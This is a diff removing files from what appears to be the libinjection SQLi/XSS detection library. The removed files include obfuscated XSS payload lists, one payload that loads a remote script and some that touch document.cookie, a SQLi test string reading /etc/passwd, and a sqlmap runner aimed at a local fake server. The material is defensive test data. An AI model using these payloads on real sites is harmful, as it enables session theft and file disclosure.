77) <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
80) <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
81) <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
82) <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
83) <script>+-+-1-+-+alert(1)</script>
84) <body/onload=&lt;!--&gt;&#10alert(1)>
85) <script itworksinallbrowsers>/*<script* */alert(1)</script
86) <img src ?itworksonchrome?\/onerror = alert(1)
87) <svg><script>//&NewLine;confirm(1);</script </svg>
88) <svg><script onlypossibleinopera:-)> alert(1)
89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
90) <script x> alert(1) </script 1=2
91) <div/onmouseover='alert(1)'> style="x:">
# unable to reproduce in IE8 or IE9
#92) <--`<img/src=` onerror=alert(1)> --!>
93) <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
94) <div style="position:absolute;top:0;left:0;width:100%25;height:100%25" onmouseover="prompt(1)" onclick="alert(1)">x</button>
95) "><img src=x onerror=window.open('https://www.google.com/');>
96) <form><button formaction=javascript&colon;alert(1)>CLICKME
97) <math><a xlink:href="//jsfiddle.net/t846h/">click
98) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
100) <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>


@ -1,57 +0,0 @@
#
# Misc XSS awesomeness from soaj1664ashar feed
# https://twitter.com/soaj1664ashar
#
# https://twitter.com/soaj1664ashar/status/424961050258063360
# 2:46 AM - 20 Jan 2014
<iframe/onload=action=/confir/.source+'m';eval(action)(1)>
# https://twitter.com/soaj1664ashar/status/418454103895728128
# 3:50 AM - 2 Jan 2014
<!--[if WindowsEdition]><script>confirm(location);</script><![endif]-->
# https://twitter.com/soaj1664ashar/status/418163175788265472/
# 8:34 AM - 1 Jan 2014 :-)
><img src=http://i.imgur.com/ISxZ5dd.jpg onmouseover=confirm(/Happy_New_Year_2014/)>
# https://twitter.com/soaj1664ashar/status/416613093490163712
# Dec 28, 2013
# appears to be specific for a sanitization filter which alters the input
# into an XSS-able form.
#<form/action=ja&Tab;vascr&Tab;ipt&colon;confirm(document.cookie)> <button/type=submit>
# https://twitter.com/soaj1664ashar/status/407438076118462464
# 6:16 PM - 2 Dec 2013
<style/onload = !-alert&#x28;1&#x29;>
# https://twitter.com/soaj1664ashar/status/407086397493747712
# Dec 1, 2013
<iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";>
# https://twitter.com/soaj1664ashar/status/400335443805237248
# not sure who is author
# FF specific bug
# Nov 13, 2013
<a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+" style="FONT-SIZE: 1000pt; FONT-FAMILY: Comic Sans MS; position:absolute;top:0;left:0;width:1000;height:1000;opacity:0">ClickMe</a>
# https://twitter.com/soaj1664ashar/status/400257634449637376
<svg><;(noitacol)mrifnoc=daolno ;howthehellitworks`=wtf>`
# https://twitter.com/soaj1664ashar/status/400257634449637376
# http://jsfiddle.net/DH8wM/10/
<svg><GMO=`<ftw=`skrowtillehehtwoh; onload=confirm(location);
# https://twitter.com/soaj1664ashar/status/396307604734881792
"><img src=x onerror=confirm(1);>
#&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;
# https://twitter.com/soaj1664ashar/status/385461391366168576
<img/src=x alt=confirm(1) onmouseover=eval(alt)>
# https://twitter.com/soaj1664ashar/status/367350377894518784
# http://pastebin.com/TVH8t5bQ
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(document.cookie)</script>"><img/id="confirm&lpar;1&#x29;"/alt="/"src="/"onerror=eval(id&#x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
# If a site has length restriction on input field then use chunk of your choice from the above vector :P


@ -1,33 +0,0 @@
/*
* Copyright (c) 2013 Radolsaw Wesolowski
*
* Permission to use, copy, modify, and distribute this software for any
* purpose with or without fee is hereby granted, provided that the above
* copyright notice and this permission notice appear in all copies.
*
*/
package main
/*
#cgo CFLAGS: -I./libinjection
#cgo LDFLAGS: -L./libinjection -linjection
#include "libinjection.h"
#include "libinjection_sqli.h"
*/
import "C"
import (
"bytes"
"fmt"
"unsafe"
)
func main() {
sqlinjection := "asdf asd ; -1' and 1=1 union/* foo */select load_file('/etc/passwd')--"
var out [8]C.char
pointer := (*C.char)(unsafe.Pointer(&out[0]))
if found := C.libinjection_sqli(C.CString(sqlinjection), C.size_t(len(sqlinjection)), pointer); found == 1 {
output := C.GoBytes(unsafe.Pointer(&out[0]), 8)
fmt.Printf("sqli with fingerprint of '%s'\n", string(output[:bytes.Index(output, []byte{0})]))
}
}


@ -1 +0,0 @@
lua-TestMore


@ -1,41 +0,0 @@
#!/usr/bin/env python
#
# Copyright 2012, 2013 Nick Galbreath
# nickg@client9.com
# BSD License -- see COPYING.txt for details
#
"""
Converts a libinjection JSON data file to a C header (.h) file
"""
def toc(obj):
""" main routine """
if False:
print 'fingerprints = {'
for fp in sorted(obj[u'fingerprints']):
print "['{0}']='X',".format(fp)
print '}'
words = {}
keywords = obj['keywords']
for k,v in keywords.iteritems():
words[str(k)] = str(v)
for fp in list(obj[u'fingerprints']):
fp = '0' + fp.upper()
words[str(fp)] = 'F';
print 'words = {'
for k in sorted(words.keys()):
#print "['{0}']='{1}',".format(k, words[k])
print "['{0}']={1},".format(k, ord(words[k]))
print '}'
return 0
if __name__ == '__main__':
import sys
import json
sys.exit(toc(json.load(sys.stdin)))


@ -1,26 +0,0 @@
#!/usr/bin/env python
"""
Generates a Lua table of fingerprints.
One can then add, turn off or delete fingerprints from lua.
"""
def make_lua_table(obj):
"""
Generates table. Fingerprints don't contain any special chars
so they don't need to be escaped. The output may be
sorted but it is not required.
"""
fp = obj[u'fingerprints']
print("sqlifingerprints = {")
for f in fp:
print(' ["{0}"]=true,'.format(f))
print("}")
return 0
if __name__ == '__main__':
import sys
import json
with open('../c/sqlparse_data.json', 'r') as fd:
make_lua_table(json.load(fd))


@ -1,62 +0,0 @@
/* libinjection.i SWIG interface file */
%module libinjection
%{
#include "libinjection.h"
#include "libinjection_sqli.h"
static char libinjection_lua_lookup_word(sfilter* sf, int lookup_type,
const char* s, size_t len)
{
lua_State* L = (lua_State*) sf->userdata;
//char* luafunc = (char *)lua_tostring(L, 2);
lua_getglobal(L, "lookup_word");
SWIG_NewPointerObj(L, (void*)sf, SWIGTYPE_p_libinjection_sqli_state, 0);
lua_pushnumber(L, lookup_type);
lua_pushlstring(L, s, len);
if (lua_pcall(L, 3, 1, 0)) {
printf("Something bad happened");
}
const char* result = lua_tostring(L, -1);
if (result == NULL) {
return 0;
} else {
return result[0];
}
}
%}
%include "typemaps.i"
// The C functions all start with 'libinjection_' as a namespace
// We don't need this since it's in the libinjection table
// i.e. libinjection.libinjection_is_sqli --> libinjection.is_sqli
//
%rename("%(strip:[libinjection_])s") "";
%typemap(in) (ptr_lookup_fn fn, void* userdata) {
if (lua_isnil(L, 1)) {
arg2 = NULL;
arg3 = NULL;
} else {
arg2 = libinjection_lua_lookup_word;
arg3 = (void *) L;
}
}
%typemap(out) stoken_t [ANY] {
int i;
lua_newtable(L);
for (i = 0; i < $1_dim0; i++) {
lua_pushnumber(L, i+1);
SWIG_NewPointerObj(L, (void*)(& $1[i]), SWIGTYPE_p_stoken_t,0);
lua_settable(L, -3);
}
SWIG_arg += 1;
}
%include "libinjection.h"
%include "libinjection_sqli.h"


@ -1,107 +0,0 @@
require 'libinjection'
-- dofile('sqlifingerprints.lua')
-- silly callback that just calls back into C
-- identical to libinjection_is_sqli(sql_state, string_input, nil)
--
function check_pattern_c(sqlstate)
return(libinjection.sqli_blacklist(sqlstate) and
libinjection.sqli_not_whitelist(sqlstate))
end
-- half lua / half c checker
-- use lua based fingerprint lookup and still uses C code
-- to eliminate false positives
function check_pattern(sqlstate)
fp = sqlstate.pat
if sqlifingerprints[fp] == true then
-- try to eliminate certain false positives
return(libinjection.sqli_not_whitelist(sqlstate))
else
-- not sqli
return 0
end
end
function lookup_word(sqlstate, ltype, word)
if ltype == 'X' then
return words['0' .. word:upper()]
else
return words[word:upper()]
end
end
dofile('words.lua')
-- THIS USES BUILT IN FINGERPRINTS
-- (with last arg of 'nil')
sqli = '1 union select * from table'
sql_state = libinjection.sqli_state()
libinjection.sqli_init(sql_state, sqli, sqli:len(), 0)
print(libinjection.is_sqli(sql_state))
print(sql_state.pat)
print('----')
inputs = {
"123 LIKE -1234.5678E+2;",
"APPLE 1 9.123 'FOO' \"BAR\"",
"/* BAR */ UNION ALL SELECT (2,3,4)",
"1 || COS(+0X04) --FOOBAR",
"dog apple @cat banana bar",
"dog apple cat \"banana \'bar",
"102 TABLE CLOTH"
}
function benchmark(imax)
local x,s
local t0 = os.clock()
local sql_state = libinjection.sqli_state()
for x = 0, imax do
s = inputs[(x % 7) + 1]
libinjection.sqli_init(sql_state, s, s:len(), 0)
libinjection.is_sqli(sql_state)
end
local t1 = os.clock()
print( imax / (t1-t0) )
end
function benchmark_callback(imax)
local x,s
local t0 = os.clock()
local sql_state = libinjection.sqli_state()
for x = 0, imax do
s = inputs[(x % 7) + 1]
libinjection.sqli_init(sql_state, s, s:len(), 0)
libinjection.sqli_callback(sql_state, 'lookup_word');
libinjection.is_sqli(sql_state)
end
local t1 = os.clock()
print( imax / (t1-t0) )
end
benchmark(1000000)
benchmark_callback(1000000)
-- THIS USES LUA FINGERPRINTS via 'check_pattern' function above
if 0 then
for x = 1,2 do
ok = libinjection.is_sqli(sql_state)
if ok == 1 then
print(sql_state.pat)
vec = sql_state.tokenvec
for i = 1, sql_state.pat:len() do
print(vec[i].type, vec[i].val)
end
end
end
end


@ -1,74 +0,0 @@
#!/usr/bin/env python
import glob
import sys
def readtestdata(filename):
"""
Read a test file and split into components
"""
state = None
info = {
'--TEST--': '',
'--INPUT--': '',
'--EXPECTED--': ''
}
for line in open(filename, 'r'):
line = line.rstrip()
if line in ('--TEST--', '--INPUT--', '--EXPECTED--'):
state = line
elif state:
info[state] += line + '\n'
# remove last newline from input
info['--INPUT--'] = info['--INPUT--'][0:-1]
return (info['--TEST--'], info['--INPUT--'].strip(), info['--EXPECTED--'].strip())
def luaescape(s):
return s.strip().replace("\\", "\\\\").replace("\n", "\\n").replace("'", "\\'")
def genluatest(fname, data):
# TBD: change to python os.path
name = fname.split('/')[-1]
if name.startswith('test-tokens-'):
testname = 'test_tokens'
extra = "\\n"
elif name.startswith('test-tokens_mysql'):
testname = 'test_tokens_mysql'
extra = "\\n"
elif name.startswith('test-folding-'):
testname = 'test_folding'
extra = "\\n"
elif name.startswith('test-sqli-'):
testname = 'test_fingerprints'
extra = ''
else:
#print "IGNORING: " + name
return
name = name.replace('.txt', '')
print "is({0}('{1}'),\n '{2}{3}',\n '{4}')\n".format(
testname,
luaescape(data[1]),
extra,
luaescape(data[2]),
name
)
def test2lua(fname):
data = readtestdata(fname)
genluatest(fname, data)
def main():
print "require 'testdriver'\n"
files = glob.glob('../tests/test-*.txt')
print "plan({0})\n".format(len(files))
for testfile in sorted(files):
test2lua(testfile)
if __name__ == '__main__':
main()


@ -1,90 +0,0 @@
require 'libinjection'
require 'Test.More'
require 'Test.Builder.Tester'
function trim(s)
return s:find'^%s*$' and '' or s:match'^%s*(.*%S)'
end
function print_token_string(tok)
local out = ''
if tok.str_open ~= '\0' then
out = out .. tok.str_open
end
out = out .. tok.val
if tok.str_close ~= '\0' then
out = out .. tok.str_close
end
return trim(out)
end
function print_token(tok)
local out = ''
out = out .. tok.type
out = out .. ' '
if tok.type == 's' then
out = out .. print_token_string(tok)
elseif tok.type == 'v' then
if tok.count == 1 then
out = out .. '@'
elseif tok.count == 2 then
out = out .. '@@'
end
out = out .. print_token_string(tok)
else
out = out .. tok.val
end
return '\n' .. trim(out)
end
function test_tokens(input)
local out = ''
local sql_state = libinjection.sqli_state()
libinjection.sqli_init(sql_state, input, input:len(),
libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_ANSI)
while (libinjection.sqli_tokenize(sql_state) == 1) do
out = out .. print_token(sql_state.current)
end
return out
end
function test_tokens_mysql(input)
local out = ''
local sql_state = libinjection.sqli_state()
libinjection.sqli_init(sql_state, input, input:len(),
libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_MYSQL)
while (libinjection.sqli_tokenize(sql_state) == 1) do
out = out .. print_token(sql_state.current)
end
return out
end
function test_folding(input)
local out = ''
local sql_state = libinjection.sqli_state()
libinjection.sqli_init(sql_state, input, input:len(), 0)
libinjection.sqli_fingerprint(sql_state,
libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_ANSI)
for i = 1, sql_state.fingerprint:len() do
-- c array is still 0 based
out = out .. print_token(libinjection.sqli_get_token(sql_state, i-1))
end
-- hack for when there is no output
if out == '' then
out = '\n'
end
return out
end
function test_fingerprints(input)
local out = ''
local sql_state = libinjection.sqli_state()
libinjection.sqli_init(sql_state, input, input:len(), 0)
local issqli = libinjection.is_sqli(sql_state)
if issqli == 1 then
out = sql_state.fingerprint
end
return out
end


@ -1,85 +0,0 @@
#!/bin/sh
# this is the script that runs in CI
set -e
DASH=----------------------
echo $DASH
gcc --version
echo $DASH
make clean
make -e check
make clean
#
# Code coverage
#
export CC=gcc
export CFLAGS="-ansi -g -O0 -fprofile-arcs -ftest-coverage -Wall -Wextra"
echo $DASH
echo "Generating code coverage"
echo "CFLAGS=$CFLAGS"
echo
make -e check
if [ -n "$COVERALLS_REPO_TOKEN" ] ; then
echo "uploading to coveralls"
coveralls \
--gcov-options '\-lp' \
--exclude-pattern '.*h' \
--exclude src/reader.c \
--exclude src/example1.c \
--exclude src/fptool.c \
--exclude src/test_speed_sqli.c \
--exclude src/test_speed_xss.c \
--exclude src/testdriver.c \
--exclude src/html5_cli.c \
--exclude src/sqli_cli.c \
--exclude python
fi
echo
unset CC
unset CFLAGS
echo
echo $DASH
clang --version
echo $DASH
./configure-clang.sh
echo
echo $DASH
echo "CLANG STATIC ANALYZER"
echo
cd src
make analyze
echo
echo $DASH
cppcheck --version
echo
cppcheck --std=c89 \
--enable=all \
--inconclusive \
--suppress=variableScope \
--suppress=missingIncludeSystem \
--quiet \
--error-exitcode=1 \
--template='{file}:{line} {id} {severity} {message}' \
.
echo "passed"
echo $DASH
export CFLAGS="-Wall -Wextra -Werror -pedantic -ansi -g -O1"
export VALGRIND="valgrind --gen-suppressions=no --leak-check=full --show-leak-kinds=all --read-var-info=yes --error-exitcode=1 --track-origins=yes --suppressions=/build/src/alpine.supp"
echo "GCC + VALGRIND"
echo $VALGRIND
echo
make clean
make -e check
unset VALGRIND
unset CFLAGS
echo
echo
echo "Done!"


@ -1,28 +0,0 @@
#!/bin/bash
set -e
# automated basic git tagging
# 1) edit the version number in
# c/libinjection_sqli.c
# pyton/setup.py
# 2) git add and commit
# 3) run this
# 4) done!
#
# get tag number
TAG=`grep 'LIBINJECTION_VERSION' ../c/libinjection_sqli.c | awk -F '"' '{print $2}' | tr -d '[[:space:]]'`
TAG="v${TAG}"
echo "TAG = ${TAG}"
echo "Tagging locally"
git tag -a "${TAG}" -m ${TAG}
echo "Sharing..."
git push origin "${TAG}"
git tag
echo "DONE"


@ -1,45 +0,0 @@
LIBINJECTION
==========================
Libinjection is a small C library to detect SQLi attacks in user input with the following goals:
* Open. Source code is on [GitHub](https://github.com/client9/libinjection/).
* Low _false-positives_. When there are high false positives, people tend to turn off any WAF or protection.
* Excellent detection of SQLi.
* High performance (currently [over 500,000 TPS](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-speed/latest/console.txt))
* Easy to test and QA
* Easy to integrate and extend
### [Try it now](/diagnostics)
### Easy to integrate
* Standard C code, and compiles as C99 and C++, with bindings to
* [Python](https://github.com/client9/libinjection/wiki/doc-sqli-python)
* [PHP](https://github.com/client9/libinjection/wiki/doc-sqli-php)
* [Lua](https://github.com/client9/libinjection/tree/master/lua)
* Small - about [1500 lines of code](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-loc/latest/console.txt) in three files
* Compiles on Linux/Unix/BSD, Mac and Windows
* No threads used and thread safe
* No recursion
* No (heap) memory allocation
* No extenal library dependencies
* [400+ unit tests](https://github.com/client9/libinjection/tree/master/tests)
* [98% code coverage](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-coverage-unittest/latest/lcov-html/libinjection/src/index.html)
* [BSD License](https://github.com/client9/libinjection/blob/master/COPYING)
Third-Party Ports
---------------------
* [java](https://github.com/Kanatoko/libinjection-Java)
* At least two .NET ports exists
* Another python wrapper
Applications
---------------------
* [ModSecurity](http://www.modsecurity.org/) - since 2.7.4 release
* [IronBee](https://www.ironbee.com) - since May 2013
* Proprietary Honeypot
* Proprietary WAF, Russia
* Proprietary WAF, Japan



@ -1,64 +0,0 @@
#!/usr/bin/env python
import sys
import re
import libinjection
import urllib
import urlparse
logre = re.compile(r' /diagnostics\?([^ ]+) HTTP')
notsqli = set([
'1ov',
'UEvEv',
'v',
'Uv',
'Uv,',
'UoEvE',
'1v',
'sov',
'1nn',
'UonnE',
'no1',
'Evk',
'E1k',
'E11k',
'Ek',
'Uv,Ev',
'UvEvk',
'UvEv,',
'Uvon'
])
def doline(logline):
"""
...GET /diagnostics?id=%22union+select HTTP/1.1
"""
mo = logre.search(logline)
if not mo:
return
sqli= False
fp = None
for key, val in urlparse.parse_qsl(mo.group(1)):
val = urllib.unquote(val)
extra = {}
argsqli = libinjection.detectsqli(val, extra)
if argsqli:
fp = extra['fingerprint']
print urllib.quote(val)
sqli = sqli or argsqli
if False: # and not sqli:
#print "\n---"
#print mo.group(1)
for key, val in urlparse.parse_qsl(mo.group(1)):
val = urllib.unquote(val)
extra = {}
argsqli = libinjection.detectsqli(val, extra)
if not argsqli and extra['fingerprint'] not in notsqli:
print "NO", extra['fingerprint'], mo.group(1)
print " ", val
if __name__ == '__main__':
for line in sys.stdin:
doline(line)


@ -1,213 +0,0 @@
#!/usr/bin/env python
import datetime
import json
import sys
from urlparse import *
import urllib
import libinjection
from tornado import template
from tornado.escape import *
import re
import calendar
months = {
'Jan':'01',
'Feb':'02',
'Mar':'03',
'Apr':'04',
'May':'05',
'Jun':'06',
'Jul':'07',
'Aug':'08',
'Sep':'09',
'Oct':'10',
'Nov':'11',
'Dec':'12'
}
# "time_iso8601":"2013-08-04T03:51:18+00:00"
def parse_date(datestr):
elems = (
datestr[7:11],
months[datestr[3:6]],
datestr[0:2],
datestr[12:14],
datestr[15:17],
datestr[18:20],
)
return ( "{0}-{1}-{2}T{3}:{4}:{5}+00:00".format(*elems), calendar.timegm( [ int(i) for i in elems] ) )
apachelogre = re.compile(r'^(\S*) (\S*) (\S*) \[([^\]]+)\] \"([^"\\]*(?:\\.[^"\\]*)*)\" (\S*) (\S*) \"([^"\\]*(?:\\.[^"\\]*)*)\" \"([^"]*)\" \"([^"]*)\"')
def parse_apache(line):
mo = apachelogre.match(line)
if not mo:
return None
(time_iso, timestamp) = parse_date(mo.group(4))
try:
(method, uri, protocol) = mo.group(5).split(' ', 2)
except ValueError:
(method, uri, protocol) = ('-', '-', '-')
data = {
'remote_addr': mo.group(1),
'time_iso8601': time_iso,
'timestamp' : timestamp,
'request_protocol': protocol,
'request_method': method,
'request_uri': uri,
'request_length': '',
'request_time': '',
'status': mo.group(6),
'bytes_sent': '',
'body_bytes-sent': int(mo.group(7)),
'http_referrer': mo.group(8),
'http_user_agent': mo.group(9),
'ssl_cipher': '',
'ssl_protocol': ''
}
return data
# http://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks-in-python
def chunks(l, n):
"""
Yield successive n-sized chunks from l.
"""
for i in xrange(0, len(l), n):
yield l[i:i+n]
def breakify(s):
output = ""
for c in chunks(s, 40):
output += c
if ' ' not in c:
output += ' '
return output
def doline(line):
line = line.replace("\\x", "%").strip()
try:
data = json.loads(line)
except ValueError, e:
data = parse_apache(line)
if data is None:
sys.stderr.write("BAD LINE: {0}\n".format(line))
return None
if not data.get('request_uri','').startswith("/diagnostics"):
return None
urlparts = urlparse(data['request_uri'])
if len(urlparts.query) == 0:
return None
qsl = [ x.split('=', 1) for x in urlparts.query.split('&') ]
target = None
for k,v in qsl:
if k == 'id':
target = v
break
if target is None:
#print "no 'id'"
return None
# part one, normal decode
target = urllib.unquote_plus(target)
# do it again, but preserve '+'
target = urllib.unquote(target)
sstate = libinjection.sqli_state()
# BAD the string created by target.encode is stored in
# sstate but not reference counted, so it can get
# deleted by python
# libinjection.sqli_init(sstate, target.encode('utf-8'), 0)
# instead make a temporary var in python
# with the same lifetime as sstate (above)
try:
targetutf8 = target.encode('utf-8')
#targetutf8 = target
except UnicodeDecodeError, e:
targetutf8 = target
#if type(target) == str:
# sys.stderr.write("Target is a string\n")
#if type(target) == unicode:
# sys.stderr.write("Target is unicde\n")
#sys.stderr.write("OOps: {0}\n".format(e))
#sys.stderr.write("Encode error: {0}\n".format(target))
try:
libinjection.sqli_init(sstate, targetutf8, 0)
except TypeError:
sys.stderr.write("fail in decode: {0}".format(targetutf8))
if type(target) == str:
sys.stderr.write("Target is a string\n")
if type(target) == unicode:
sys.stderr.write("Target is unicde\n")
return None
sqli = bool(libinjection.is_sqli(sstate))
return (target, sqli, sstate.fingerprint, data['remote_addr'])
if __name__ == '__main__':
s = """
174.7.27.149 - - [29/Jul/2013:01:30:19 +0000] "GET /diagnostics?id=x|x||1&type=fingerprints HTTP/1.1" 200 1327 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36" "-"
"""
s = """
{"timestamp":1371091563,"remote_ip":"219.110.171.2","request":"/diagnostics?id=1+UNION+ALL+SELECT+1<<<&type=fingerprints","method":"GET","status":200,"user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1","referrer":"https://libinjection.client9.com/diagnostics","duration_usec":160518 }
{"timestamp":1371091563,"remote_ip":"219.110.171.2","request":"/diagnostics?id=2+UNION+ALL+SELECT+1<<<&type=fingerprints","method":"GET","status":200,"user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1","referrer":"https://libinjection.client9.com/diagnostics","duration_usec":160518 }
"""
if len(sys.argv) == 2:
fh = open(sys.argv[1], 'r')
else:
fh = sys.stdin
targets = set()
table = []
for line in fh:
parts = doline(line.strip())
if parts is None:
continue
# help it render in HTML
if parts[0] in targets:
continue
else:
targets.add(parts[0])
# add link
# add form that might render ok in HTML
# is sqli
# fingerprint
table.append( (
"/diagnostics?id=" + url_escape(parts[0]),
breakify(parts[0].replace(',', ', ').replace('/*', ' /*')),
parts[1],
parts[2],
parts[3]
)
)
table = reversed(table)
loader = template.Loader(".")
txt = loader.load("logtable.html").generate(
table=table,
now = str(datetime.datetime.now()),
ssl_protocol='',
ssl_cipher=''
)
print txt


@ -1,8 +0,0 @@
#!/bin/bash
fname=$1
echo '{% extends "base.html" %}'
echo '{% block body %}'
#github-markup $fname
curl -H 'Content-Type: text/x-markdown' --data-binary @$fname https://api.github.com/markdown/raw
echo '{% end %}'


@ -1,79 +0,0 @@
#!/bin/bash
#
# Sync ModSecurity / libinjection
#
# explode on error
set -e
#
# CLONE LIBINJECTION
#
if [ ! -d libinjection ]; then
git clone https://github.com/client9/libinjection.git
else
(cd libinjection; git pull)
fi
pwd
#
# CLONE MODSECURITY
#
if [ ! -d ModSecurity ]; then
git clone https://github.com/client9/ModSecurity.git
else
( cd ModSecurity; git pull )
fi
pwd
#
# Use right branch
#
(cd ModSecurity; git checkout remotes/trunk )
pwd
#
# COPY IN NEW LIBINJECTION
#
cp libinjection/COPYING.txt ModSecurity/apache2/
cp libinjection/c/libinjection.h ModSecurity/apache2/libinjection
cp libinjection/c/libinjection_sqli.c ModSecurity/apache2/libinjection
cp libinjection/c/libinjection_sqli.h ModSecurity/apache2/libinjection
cp libinjection/c/libinjection_sqli_data.h ModSecurity/apache2/libinjection
#
# REGENERATE / BUILD
#
cd ModSecurity
./autogen.sh
./configure
make
make distclean
#
# ADD NEW BITS
#
git add apache2/libinjection/COPYING.txt
git add apache2/libinjection/libinjection.h
git add apache2/libinjection/libinjection_sqli.h
git add apache2/libinjection/libinjection_sqli.c
git add apache2/libinjection/libinjection_sqli_data.h
# this file seems to get modified, reset just to be safe
git checkout standalone/Makefile.in
git commit -m 'libinjection sync'
#
# PUSH TO SPECIAL BRANCH
#
echo "pushing to remotes/trunk"
git push origin remotes/trunk
#
# PROFIT
#


@ -1,47 +0,0 @@
#!/usr/bin/python
mysql_ops = (
'AND',
'&&',
'=',
'&',
'|',
'^',
'DIV',
'/',
'<=>',
'>=',
'>',
'<<',
'<=',
'<',
'LIKE',
'-',
'%',
'MOD',
'!=',
'<>',
'NOT LIKE',
'NOT REGEXP',
'OR',
'||',
'+',
'REGEXP',
'>>',
'RLIKE',
'NOT RLIKE',
'SOUNDS LIKE',
'*',
'XOR'
)
print '# mysql implicit conversions tests'
for op in mysql_ops:
if op == '+':
op = '%2B'
print "A' {0} 'B".format(op)
print "A '{0}' B".format(op)
print "'{0}'".format(op)
print "' {0} '".format(op)


@ -1,111 +0,0 @@
#!/usr/bin/env python
# A 'nullserver' that accepts input and generates output
# to trick sqlmap into thinking it's a database-driven site
#
import sys
import logging
import urllib
import tornado.httpserver
import tornado.ioloop
import tornado.web
import libinjection
class ShutdownHandler(tornado.web.RequestHandler):
def get(self):
global fd
fd.close()
sys.exit(0)
class CountHandler(tornado.web.RequestHandler):
def get(self):
global count
self.write(str(count) + "\n")
def boring(arg):
if arg == '':
return True
if arg == 'foo':
return True
if arg == 'NULL':
return True
try:
float(arg)
return True
except ValueError:
pass
return False;
class NullHandler(tornado.web.RequestHandler):
def get(self):
global fd
global count
params = self.request.arguments.get('id', [])
sqli = False
if len(params) == 0 or (len(params) == 1 and boring(params[0])):
# if no args, or a single value with uninteresting input
# then just exit
self.write("<html><head><title>safe</title></head><body></body></html>")
return
for arg in params:
sqli = libinjection.detectsqli(arg)
if sqli:
break
# we didn't detect it :-(
if not sqli:
count += 1
args = [ arg.strip() for arg in params ]
#fd.write(' | '.join(args) + "\n")
for arg in args:
extra = {}
sqli = libinjection.detectsqli(arg, extra)
logging.error("\t" + arg + "\t" + str(sqli) + "\t" + extra['fingerprint'] + "\n")
#for arg in param:
# fd.write(arg + "\n")
# #fd.write(urllib.quote_plus(arg) + "\n")
self.set_status(500)
self.write("<html><head><title>safe</title></head><body></body></html>")
else:
self.write("<html><head><title>sqli</title></head><body></body></html>")
import os
settings = {
"static_path": os.path.join(os.path.dirname(__file__), "static"),
"cookie_secret": "yo mama sayz=",
"xsrf_cookies": True,
"gzip": False
}
application = tornado.web.Application([
(r"/null", NullHandler),
(r"/shutdown", ShutdownHandler),
(r"/count", CountHandler)
], **settings)
if __name__ == "__main__":
global fd
global count
count = 0
fd = open('./sqlmap-false-negatives.txt', 'w')
import tornado.options
#tornado.options.parse_config_file("/etc/server.conf")
tornado.options.parse_command_line()
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(8888)
tornado.ioloop.IOLoop.instance().start()


@ -1,29 +0,0 @@
#!/bin/bash
# Starts a bogus webserver that logs all input
# Then runs sqlmap
#
./nullserver.py --logging=none &
if [ ! -d "sqlmap" ]; then
git clone https://github.com/sqlmapproject/sqlmap.git
else
(cd sqlmap; git pull)
fi
SQLMAP=./sqlmap/sqlmap.py
URL=http://127.0.0.1:8888
HPP=
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1234.5
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=foo
HPP=--hpp
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1234.5
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=foo
curl -o /dev/null ${URL}/shutdown


@ -1,339 +0,0 @@
#!/usr/bin/env python
#
#
#
import datetime
import sys
import logging
import urllib
import urlparse
try:
